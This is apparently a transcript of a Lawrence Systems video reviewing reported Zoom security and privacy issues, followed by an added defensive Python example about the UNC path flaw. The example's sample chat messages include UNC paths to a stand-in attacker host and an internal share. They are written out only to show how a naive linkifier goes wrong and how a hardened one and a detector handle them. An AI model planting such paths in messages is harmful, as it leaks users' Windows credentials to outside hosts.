Tom here from Lawrence Systems with what you need to know about the latest Zoom vulnerabilities. Don't worry, there's not that many of them right now as of April 7th; who knows, I can't predict the future, but at least we'll cover what I know right now and talk about the Zoom product. If you want to learn more about my company, head over to lawrencesystems.com; if you'd like to hire us for a short project, there's a Hire button up at the top. If you want to support this channel in other ways, there are some affiliate links down below to get you deals and discounts on products and services we talk about on this channel.

We'll start with this headline. The first one is Zoom leaking data. Rapid7 put this up, and I kind of like how they worded it: the gossip, the reporting, and what happened. I'm not going to read the entirety of this, but I'll run over the big ones.

Zoom leaking data to Facebook: they used a software development kit from Facebook. They did stop using it, but that SDK did send some data to Facebook even when you weren't using Facebook, because the "Login with Facebook" feature would pull some data, and they were probably going to pull whether or not you were logged into Facebook already so they could just use your OAuth token and verify it, etc. It didn't seem like that big of a deal. I don't consider Zoom a privacy-based application, but they did fix it.

Zoom and end-to-end encryption. Okay, end-to-end encryption: what I think it means and what people in marketing think it means. It's a great comfort feeling to think that we're end-to-end encrypted. I think end-to-end encryption means from my device to the device of the person I'm speaking with. Their marketing team thinks end-to-end encryption means from their device to their server. They do encrypt it from the device, my device here that I'm recording on, to their servers, but it can be decrypted at the Zoom level. So the Zoom servers have access to your data, and they encrypt it again before it goes to the other person. Nobody in between, not my ISP or any other computers local to my network, is able to decrypt the data easily, because it seems to be pretty strong encryption; we'll get to that down below. But for the most part, yes, Zoom themselves can decrypt it. So take that for what it's worth. That's one more step in the path.

This one was kind of a minor one, but it got fixed and it's worth noting: what about these UNC path problems? Well, yeah, "Zoom lets attackers steal passwords and Windows credentials" is a great headline. I did tweet it out, and I think it's relevant, but it was fixed relatively quickly. Basically, they weren't sanitizing the inputs for things you could dump in there, and you could possibly exploit UNC paths. I'm not going to dive too deep into the technical details of it, because it's fixed anyway, but you can read it in this blog post.

This was just silly: Zoom on the OS X interface. Yes, they did some strange things, including the dialog box that says "System needs your privilege to change" instead of saying something like "Zoom needs your password to update the application." Yes, that's weird in terms of wording. Perhaps someone who doesn't speak native English wrote that, or some developer thought that was a funny way to word it; I don't know the details. But these are little things that they did fix.

The other thing they did: it was said they're using UX hacks to get access to the webcam. No, they're trying to get as few clicks as possible so end users don't drive them crazy with support calls. Trust me.
I get this as someone who's dealt with a lot of end-user support. So was it the best choice to do these UX hacks, which are used by, well, less savory applications? Probably not the best idea, but it also removes some of the tech support from it. So they didn't have malicious intent, even though they had a way of doing it that seemed malicious, and this just gave permission to the webcam more easily, because no one wants a phone call about "how do I get my webcam working with Zoom" and all the technical support challenges of that.

These local privilege escalations have been fixed relatively fast. This was kind of weird; I don't like the way they worded it and I don't like the way it was handled. "Ex-NSA hacker tells me everything": it starts with "ex-NSA hacker", that's a great headline, right? But this person, who is a truly good security researcher, covered some findings and dropped them over on Objective-See, which is a blog, but by dropping them didn't appear to contact Zoom, according to the Rapid7 research they did here. Those have been fixed, but they were basically some different ways Zoom handled things, and not the best way. So it was a potential problem for people where something else running on your computer could take over by using some of the privileged tools inside of Zoom, but they still had to have access to your computer to make this happen.

Zoom, China, encryption and more snafus. Back to what I said about Zoom not being truly end-to-end encrypted: that means it pit-stops at the Zoom server level and they're able to decode it there. And what about China? This was a popular comment on my other Zoom video. Yes, they have servers there, and they do some development in China. The servers I pointed out in my video were here in the US, but either way, whether it's the US or China, China has their own government with different policies, and we have policies here for FISA warrants and subpoenas, because it's not end-to-end encrypted.

Yes, they're subject to the laws of the land in which they reside. So what that means is, if you have something you're worried about, state-level secrets that you have to work with because you're a security contractor or have some government title, Zoom may not be the best thing for you to use if you're worried about such things. Whether you're a European user or an American user, please note it is subject to not only the FISA warrants here in the US, with subpoenas from the FBI and other US agencies, but any other nation-state that cooperates directly with the US. So if there's some other operation going on and they are cooperating with the FBI, the FBI could, because of the laws of the land here where many of the servers reside, also gain access to it. Any time you're not using end-to-end encryption, this is just something you need to think about.

Maybe this doesn't matter if you're just doing your Zoom happy hour and doing a toast to your friends; it's probably great for that. If you're working on something at the national-security level and you want to have that discussion, Zoom's probably not the thing to do that with. If you have lots of company trade secrets and you're worried about spying by third-party companies that may steal those secrets, don't use Zoom; that's probably not a good idea. So if you are wanting to really lock that down in your business, running your own servers for messaging makes a lot more sense. I know someone commented that Zoom has some commercial stuff available.
I've also talked before, I mentioned this in another video, about Jitsi. Chris from Crosstalk just did a video on how to get that stood up. If you want something where you are in control, then go ahead and set something up where you're in control and the servers don't rely on these third parties. That's how you get around some of that, where you go, "I don't want someone pit-stopping on the server or listening in on it," because the reality, the other side of this, is that if any bad actors get a hold of Zoom's servers and get within their system, all the information will become public as well. So that's something else to think about.

There are a few other posts on here and a few other details, but nothing really relevant from that, so it's just some more headline debunking; so there's the debunking, giving you the real details behind there. My overall opinion: as long as you're not trying to do something at the national-security level, or requiring state secrets, or having some top-secret information to share, or proprietary secrets that you worry some other country could potentially tap into, if you're not in any of those categories, then Zoom's okay to use. It's probably really good for end users and things like that.

There's been a lot of other talk about a few things that aren't exactly vulnerabilities, but where they found recordings of Zoom, or people jumping into Zoom meetings. Zoom has done a great job of updating all the defaults to help mitigate some of those problems, because not putting passwords on Zooms and only having a short number of digits that people could guess obviously creates a problem, with people just jumping into your conferencing call unannounced, and maybe not for the best reasons, because, well, you know, jumping in on someone's call to insert something else is funny to many people that do things for the lulz. So those things should be looked at. You should take the time to look at how to secure Zoom; it's really easy to do, and most of the defaults have been updated since the last video I did to include most of those security defaults. So Zoom's come a long way for that.

As far as finding these videos: yes, you can see the little button when people are recording the video, and people are accidentally leaving these open, publishing them to Dropbox, publishing them to different cloud hosting without any security. There's also always the chance, though, when you have a group conference call going, that someone's simply recording the screen, and eventually that data can get out as well. So those are all things to consider when you're using any of these tools; always be conscious of it. I always kind of comment on my thought process: if I'm having a conversation on a platform like Zoom, I think of it as a conversation at the park. I don't see anyone next to me really listening, but that person on the bench over there might be listening. So I come at it from that perspective, I think about that, and I'm very conscious about what I'd say on there. If I really want to have a private conversation off the record, you have to use something that's using end-to-end encryption if you really want to lock it down, which is a lot harder, but Zoom makes it a lot easier, so you're going to see a lot of average end users using it. And if you just want to do webinars and talk about security and things like that and have general conversations with people, which I have had on Zoom a lot, and a lot of the podcasts I've done and a lot of the interviews I've done have been on Zoom, I think it's a great tool for things like that, especially because most of that information ends up public anyway. So I'm not saying not to use it.
I'm saying think about the use case you use it for. Also, if you're a hundred percent privacy-oriented and don't want to be tracked online or anything like that, Zoom may not be for you either. Yes, they're going to try to collect data about you; giving them the minimal amount of data is going to be the best solution for that. But, you know, use everything with caution and keep an open mind with all of it. I'll leave this link to Rapid7 so you can dive into all the details. Thanks.

And thank you for making it to the end of the video. If you liked this video, please give it a thumbs up. If you'd like to see more content from the channel, hit the subscribe button, and hit the bell icon if you'd like YouTube to notify you when new videos come out. If you'd like to hire us, head over to lawrencesystems.com, fill out our contact page, and let us know what we can help you with and what projects you'd like us to work together on. If you want to carry on the discussion, head over to forums.lawrencesystems.com, where we can carry on the discussion about this video, other videos, or other tech topics in general; even suggestions for new videos are accepted right there on our forums, which are free. Also, if you'd like to help the channel in other ways, head over to our affiliate page; we have a lot of great tech offers for you. And once again, thanks for watching, and see you next time.
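The UNC path issue the video mentions is only described as "not sanitizing the inputs". The block below is an added example written for this page; it is not Zoom's code and does not come from the video or the Rapid7 post. It assumes (and this is an assumption here) that the mechanism was a chat linkifier that turned \\host\share strings into clickable links, which on Windows makes the client try to authenticate to that host over SMB when clicked. It shows the naive linkifier beside a hardened one that only links http/https, plus a small detector you could run over chat logs. The sample messages are constructed.

```python
"""
Added illustration (not Zoom's code): a chat linkifier that treats UNC paths
as links, and a hardened version that only links http/https.

Assumption, labelled as such: the vulnerable client turned anything that
looked like a link, including \\host\share UNC paths, into a clickable target.
"""
import html
import re
from urllib.parse import urlsplit

# Constructed sample chat messages, not captured traffic.
SAMPLE_MESSAGES = [
    "slides: https://example.com/deck.pdf",
    "grab the file from \\\\attacker.example\\share\\notes.docx",
    "also see \\\\10.0.0.5\\c$ and ftp://files.example/x",
    "no links here, just text",
]

# Anything a naive linkifier would treat as a link: scheme://... or a \\ prefix.
LINK_LIKE_RE = re.compile(r"(?:[a-zA-Z][a-zA-Z0-9+.-]*://\S+|\\\\\S+)")
ALLOWED_SCHEMES = {"http", "https"}


def find_unc_paths(message: str) -> list[str]:
    """Detection helper: every \\host\share-style token in a message."""
    return [t for t in LINK_LIKE_RE.findall(message) if t.startswith("\\\\")]


def _anchor(target: str) -> str:
    return f'<a href="{html.escape(target, quote=True)}">{html.escape(target)}</a>'


def linkify_naive(message: str) -> str:
    """Vulnerable pattern: every link-like token becomes an <a href>, UNC paths included.
    A click on the UNC link is what triggers the outbound SMB authentication."""
    return LINK_LIKE_RE.sub(lambda m: _anchor(m.group(0)), message)


def linkify_hardened(message: str) -> str:
    """Hardened form: only http/https URLs become links; UNC paths and other
    schemes (ftp, file, smb, ...) are rendered as inert, escaped text."""
    def repl(m: re.Match) -> str:
        target = m.group(0)
        if target.startswith("\\\\"):
            return html.escape(target)          # UNC path: never clickable
        if urlsplit(target).scheme.lower() not in ALLOWED_SCHEMES:
            return html.escape(target)          # unknown scheme: plain text
        return _anchor(target)
    return LINK_LIKE_RE.sub(repl, message)


def render_all(messages: list[str], hardened: bool) -> list[str]:
    fn = linkify_hardened if hardened else linkify_naive
    return [fn(m) for m in messages]


if __name__ == "__main__":
    for msg in SAMPLE_MESSAGES:
        print("UNC paths found:", find_unc_paths(msg))
        print("naive    :", linkify_naive(msg))
        print("hardened :", linkify_hardened(msg))
        print()
```

The fix is an allowlist of schemes rather than a denylist of `\\`, because `file://` and `smb://` targets can produce the same outbound authentication; the detector is what you would point at exported chat history to see whether anyone has already been sending such paths.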